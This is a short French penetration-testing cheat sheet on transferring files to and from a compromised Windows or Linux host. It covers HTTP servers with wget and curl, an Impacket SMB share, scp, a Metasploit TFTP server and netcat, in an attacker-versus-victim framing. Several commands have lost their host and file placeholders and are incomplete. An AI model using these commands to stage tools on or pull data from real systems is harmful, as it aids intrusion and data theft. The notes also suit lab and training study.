# [Exploitation/Réseau] Transfert de fichiers ## Introduction Cette documentation présente plusieurs solution pour envoyer des fichiers sur un serveur compromis que ce soit Linux ou Windows via différents protocoles comme HTTP, SSH, FTP et SMB. ## Techniques #### updog / SimpleHTTPServer - L'outil **updog** a remplacé le module python **SimpleHTTPServer** qui permet de créer rapidement un serveur web HTTP sur lequel héberger des fichiers : ```bash python3 -m updog -p 80 ``` - Et à l'ancienne avec **SimpleHTTPServer** : ```bash python3 -m http.server 80 ``` - Pour récupérer le fichier avec **wget** en Powershell : ```powershell powershell wget http:/// -o ```

Sous Linux vous pouvez utiliser la même commande sans powershell si le paquet wget est installé.

- On peut aussi faire avec **curl** : ```powershell curl http:/// -o ```

Fonctionne aussi bien sur Windows que sur Linux !

#### Impacket SMB Server - On peut monter un serveur SMB rapidement avec la **suite Impacket** : ```bash impacket-smbserver share $(pwd) -smb2support ``` - Puis sur la machine victime Windows on peut copier le fichier : ```powershell copy \\\share\ ``` - Et pour Linux : ```bash smbclient -L smbclient "\\\\\share" ls get put ``` #### SCP - Utilise le protocole **SSH** pour envoyer un fichier : ```bash scp @:/tmp ``` - Ou en récupérer : ```bash scp @:/// ``` #### TFTP - Sur la machine de l'attaquant lancez **Metasploit** puis : ``` use auxiliary/server/tftp set srvhost set tftproot run ``` - Depuis une machine Windows récupérer des fichiers : ``` tftp -i GET ``` #### Netcat Depuis la machine qui doit recevoir le fichier : ```bash nc -lvp > ``` Depuis la machine qui doit envoyerle fichier : ```bash nc < ```